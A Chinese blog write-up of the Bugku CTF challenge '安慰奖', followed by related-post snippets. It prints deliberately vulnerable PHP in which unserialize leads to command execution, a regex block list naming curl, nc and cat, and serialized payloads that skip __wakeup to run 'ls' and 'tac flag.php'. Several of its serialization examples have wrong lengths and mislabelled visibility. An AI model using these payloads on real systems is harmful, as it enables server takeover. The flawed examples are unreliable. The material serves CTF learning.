Bugku_安慰奖

最新推荐文章于 2022-11-15 16:17:36 发布
最新推荐文章于 2022-11-15 16:17:36 发布
阅读量650 收藏 6
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CaiNiaoLW/article/details/114178231
版权

打开页面,发现是空白的,查看源码,发现一段base64加密的密文,

解密后是backups单词,这个意思是备份,可以猜测是跟index.php.bak文件有关,下载下来备份文件后,获得后台代码,开始代码审计。

<?php

header("Content-Type: text/html;charset=utf-8");
error_reporting(0);
echo "<!-- YmFja3Vwcw== -->";
class ctf
{
    protected $username = 'hack';
    protected $cmd = 'NULL';
    public function __construct($username,$cmd)
    {
        $this->username = $username;
        $this->cmd = $cmd;
    }
    function __wakeup()
    {
        $this->username = 'guest';
    }

    function __destruct()
    {
        if(preg_match("/cat|more|tail|less|head|curl|nc|strings|sort|echo/i", $this->cmd))
        {
            exit('</br>flag能让你这么容易拿到吗?<br>');
        }
        if ($this->username === 'admin')
        {
           // echo "<br>right!<br>";
            $a = `$this->cmd`;
            var_dump($a);
        }else
        {
            echo "</br>给你个安慰奖吧,hhh!</br>";
            die();
        }
    }
}
    $select = $_GET['code'];
    $res=unserialize(@$select);
?>

通过这里的代码,可以知道,这里考的是php序列化,和反序列化的一些知识,还有linux命令的考察。

 序列化与反序列化

序列化和反序列化的概念

序列化就是将对象转换成字符串。字符串包括 属性名 属性值 属性类型和该对象对应的类名。
反序列化则相反将字符串重新恢复成对象。
对象的序列化利于对象的保存和传输,也可以让多个文件共享对象。

序列化的常见魔术方法

__construct() 创建对象时调用
__destruct() 销毁对象时调用
__toString() 当一个对象被当作一个字符串使用
__sleep() 在对象在被序列化之前运行
__wakeup 将在序列化之后立即被调用

 

看一串字符串

O:5:"Bugku":2{s:4:"flag";s:13:"flag{smallWhite}";s:4:"num";i:7;}

O:代表对象

5:表示对象类名占5个字符

”Bugku“:表示类名

3:表示类中有3个属性

s:字符串

4:属性名占4个字符

"flag":属性名

"flag{smallWhite}":这个是flag属性的值。

后面的类似

 访问控制修饰符

public(公有) 

protected(受保护) 

private(私有的) 

protected属性被序列化的时候属性值会变成:%00*%00属性名 

private属性被序列化的时候属性值会变成:%00类名%00属性名

 例子

class bugku{

    protected $username='admin';
    private $password='admin123';

}
序列化

O:5:"bugku":2{s:12:"%00bugku%00admin";s:5:"admin";s:11:"%00*%00password";s:8:"admin123"}

这里的结果可以看出属性权限对于序列化结果的影响

 绕过__wakeup()函数

当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。


O:5:"bugku":3{s:12:"%00bugku%00admin";s:5:"admin";s:11:"%00*%00password";s:8:"admin123"}

通过上面序列化知识的了解,我们就可以开始解题了。

这里可以看到我们应该是利用code变量的get传参,而我们传入的东西,是序列化的结果,来绕过反序列化这个步骤。

这里可以看到我们应该是利用code变量的get传参,而我们传入的东西,是序列化的结果,来绕过反序列化这个步骤。

接下来就是wakeup的绕过,因为,如果不绕过wakeup,我们无法对username传入想要的参数,,绕过wakeup后,只要传入的username和cmd的值正确,在die()的时候就会调用__destruct()函数,来执行cmd命令。

 

<?php

header("Content-Type: text/html;charset=utf-8");
error_reporting(0);
echo "<!-- YmFja3Vwcw== -->";
class ctf
{
    protected $username = 'hack';
    protected $cmd = 'NULL';
    public function __construct($username,$cmd)
    {
        $this->username = $username;
        $this->cmd = $cmd;
    }
    function __wakeup()
    {
        $this->username = 'guest';
    }//绕过wakeup,不然无论你给username传什么值,都会被wakeup弄成guest。

    function __destruct()
    {
        if(preg_match("/cat|more|tail|less|head|curl|nc|strings|sort|echo/i", $this->cmd))//这里很多命令都被过滤了,但是tac没有被过滤,所以我们可以利用tac来查看
        {
            exit('</br>flag能让你这么容易拿到吗?<br>');
        }
        if ($this->username === 'admin')
        {
           // echo "<br>right!<br>";
            $a = `$this->cmd`;
            var_dump($a);//如果传入的username值为admin,那么后台就会执行cmd传入的命令。
        }else
        {
            echo "</br>给你个安慰奖吧,hhh!</br>";
            die();
        }
    }
}
    $select = $_GET['code'];
    $res=unserialize(@$select);
?>

根据分析可以构造payload:

code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:2:"ls";}
先用ls看看,flag是不是就在当前目录下。

发现flag就在当前目录,有很多命令被过滤了,经过查询对照linux查看文件命令,发现tac这个命令还没有被过滤。

code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac%20flag.php";}

因此使用tac查看flag.php就可以查看到flag。

刘哥高手来了
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
bugku 安慰
濯君
12-31 1948
打开网页,发现什么也没有,查看源码,发现YmFja3Vwcw==,base64解码,得到backups 查看根目录下index.php.bak文件,得到代码 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; #base64解码,backups class ctf { protected $username = 'hac.
bugku】-安慰
weixin_52116519的博客
04-01 793
考点1:绕过__wakeup() 当序列化字符串表示对象属性个数的值大于真实个数的属性时,就会跳过__wakeup()的执行。 考点2:私有属性绕过 ①protected属性被序列化的时候属性值会变成:%00*%00属性名。 private属性被序列化的时候属性值会变成:%00类名%00属性名。 ②直接url编码输出。 考点3:``反引号,可以作为系统命令输出给var_dump $a = `$this->cmd`; var_dump($a); 解题 1、看源码 2、base64解码,是“备份”的意
Bugku安慰
qq_46230755的博客
01-30 394
打开来查看源代码发现提示 YmFja3Vwcw== base64解码后得到:backups 扫描一下网站 在index.php.bak找到备份文件 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $username = 'hack'; protected $cmd
Bugku CTF 每日一题 安慰
彼岸花苏陌的博客
01-19 677
安慰 打开网页啥都没有 习惯性按f12发现一段base64,解码后发现是 YmFja3Vwcw== backups(备份) 于是想到了网站备份,但是备份目录忘了 于是用dirsearch扫了一下 发现是index.php.bak 于是下载源码发现是代码审计 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class
bugku web 安慰
m0_58189778的博客
08-19 340
题目:安慰 知识点:php反序列化 工具: 解题: 点开链接: 空白页面,然后查看源码,发现注释中有base64,解码得到backups,故猜测应该是和备份文件有关。 用御剑扫描,发现index.php.bak,下载打开: 先分析这个类,大致观察一下能拿到flag的地方就是__destruct中的反引号,这里执行了类的cmd属性;再看到后面的反序列化,这里应该是要构造相应的序列化字符串,当__destruct自动执行时命令执行即可。构造payload需要注意的是代码中过滤了.
自动抽大转盘
11-04
例如,大区域的面积可以设计得较小,小安慰的面积相对较大。在编程中,可以通过设置每个项对应的权重值来实现。 3. **界面设计**:大转盘的视觉效果很重要,需要使用前端技术(如HTML、CSS和JavaScript)...
基于java的抽系统
02-16
例如,添加“幸运”、“安慰”等特殊项,以提高参与者的参与度和满意度。 动态抽效果是这个系统的一大亮点。它通过丰富的视觉展示,如旋转的抽盘、闪烁的灯光或者滚动的名字列表,来增强现场的氛围。这些...
软件个人使用版本
01-21
4. **项设置**:用户可以根据需要设置不同级别的项,如一等、二等安慰等,并设定每个项的中概率。 5. **实时显示**:软件在抽过程中会实时展示当前状态,如剩余品、已抽出的中者等,增加活动...
年会抽软件
03-29
2. **项设置**:软件允许用户自定义不同的项等级,比如一等、二等、三等,以及可能的安慰等,可以根据实际需求进行配置。 3. **抽过程**:软件提供了随机抽取获者的方式,保证了抽的公正性。有的...
安慰剂检验stata代码和案例数据
12-26
安慰剂检验在统计学和经济学领域中是一种重要的分析方法,主要用于评估研究结果的稳健性和假设检验的有效性。在随机对照试验(RCT)中,安慰剂通常用于对照组,以确保观察到的效果是由于实验处理而非其他因素。在...
BUGKU——安慰
doraemon12345的博客
06-08 228
昨天刚写了一道绕过_wakeup()函数的题目今天又遇到一道,刚好拿来复习一下 _wakeup()函数在反序列化字符串时,属性个数的值大于实际属性个数时,会跳过_wakeup()函数的执行 打开题目发现是个空白页面,查看一下源码,有个base64解码,解密出一个单词,意思是备份,然后尝试下载备份,这里有几种方式,因为不知道是哪种,就一 一尝试 网站源码:www.zip .bak文件:xxx.bak(一般题目会提示文件名,不提示就尝试index.php.bak) vim缓存:xxx.swp意外退出为xxx
bugku-web-安慰
m0_57954651的博客
11-15 809
唯一可以传的是code的值 所以用code里面包含username和cmd即可传值给他们因为类名是ctf 所以构造为。exit('flag能让你这么容易拿到吗?get获取code的值传给select并把select的值反序列化后传给res。如果username的值为admin将cmd的值传给a变量并输出执行。打开 进行代码审计 是php序列化 反序列化的内容。存在一个flag.php文件 但是访问没有结果。此处是将username的值改为guest。点开链接 是空白页面。
BugKu_安慰
羽的博客
07-02 189
解码 告诉我有备份文件。 找到这个 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $username = 'hack'; protected $cmd = 'NULL'; public function __construct($u...
bugku安慰(绕过__wakeup)
EC_Carrot的博客
12-24 947
题目 右键源代码发现<!-- YmFja3Vwcw== -->,base64解码提示说有备份 我这里用dirsearch扫到备份文件为index.php.bak 源码: error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $username = 'hack'; protected $cmd = 'NULL'; public function __construct($u
Bugku WEB 安慰
qq_41696858的博客
07-18 246
<?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; #base64解码,backups class ctf { protected $username = 'hack'; protected $cmd = 'NULL'; public function __construct($username,$cmd)
三十七、bugku安慰
山兔的博客
09-05 155
打开网页,一片空白,查看源码,发现YmFja3Vwcw==,base64解码得到backups。 用御剑土司没跑出来,御剑1.5跑出来了/flag.php,/index.php.bak。 下载文件,得到了源码,发现是考序列化和反序列化。 百度搜索相关知识, _wakeup()当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过_wakeup()的执行。 序列化就是将对象转换成字符串。字符串包括属性名、属性值、属性类型和该对象对应的类名。反序列化则相反将字符串重新恢复成对象。 对象的序列化利于对象的
bugku web-安慰-考查反序列化和魔术方法
weixin_46578840的博客
09-04 317
打开网址发现一片空白 审查源代码发现一串base,解码得到备份 打开查看发现源代码, <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $username = 'hack'; protected $cmd = 'NULL'; public function __
Farmer John的故事
tystrwor的博客
09-04 6283
从前有个农民,名字叫约翰,于是大家叫他Farmer John(FJ)。FJ养了很多奶牛,这些奶牛很聪明,它们很喜欢看自然科学和数学书,但是它们对书的ISBN码感到奇怪,于是就有了ISBN问题。渐渐的,奶牛们的书多了起来,于是它们决定买背包来放书,然后就有了背包问题。奶牛们又喜欢上了下棋,于是就有了过河卒与骑士巡游问题。奶牛们决定航海去增长见识,在途中它们参与了对一艘名叫铁达尼克号的船的营救。最后,...
完成视频宯宲小宭戏宧第一部宩功能,通过jspforward实现改变当前输宬流宧功能,宲宧数字大于等于60,显示宯宧页面,否宱显示宯“安慰”宧页面。
最新发布
07-13
要实现根据得分显示不同项的功能,您可以使用JSP的`<jsp:forward>`标签来实现页面的跳转。以下是一个示例: 首先,在您的项目中创建两个JSP页面,一个是“项页面”(award.jsp),另一个是“安慰页面”(consolation.jsp)。 在award.jsp页面中,您可以编写显示获信息的代码,例如: ```jsp <h1>恭喜您获得一等!</h1> <p>您的得分是:${score}</p> ``` 在consolation.jsp页面中,您可以编写显示安慰信息的代码,例如: ```jsp <h1>很遗憾,您未获得任何项。</h1> <p>您的得分是:${score}</p> ``` 接下来,在您的主要JSP页面中,根据得分使用`<jsp:forward>`标签进行页面跳转。例如: ```jsp <% int score = 65; // 假设得分为65,您可以根据实际情况设置得分 %> <% if (score >= 60) { %> <jsp:forward page="award.jsp"> <jsp:param name="score" value="<%= score %>" /> </jsp:forward> <% } else { %> <jsp:forward page="consolation.jsp"> <jsp:param name="score" value="<%= score %>" /> </jsp:forward> <% } %> ``` 上述代码首先定义了一个假设的得分变量`score`,然后使用条件判断,如果得分大于等于60,就通过`<jsp:forward>`标签跳转到award.jsp页面,并传递得分参数。如果得分小于60,就跳转到consolation.jsp页面,并传递得分参数。 在award.jsp和consolation.jsp页面中,通过`${score}`表达式获取并显示得分参数的值。 请根据您的需求和实际情况修改代码中的得分值和页面内容。 希望这可以帮助到您!如果您有任何进一步的问题,请随时提问。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值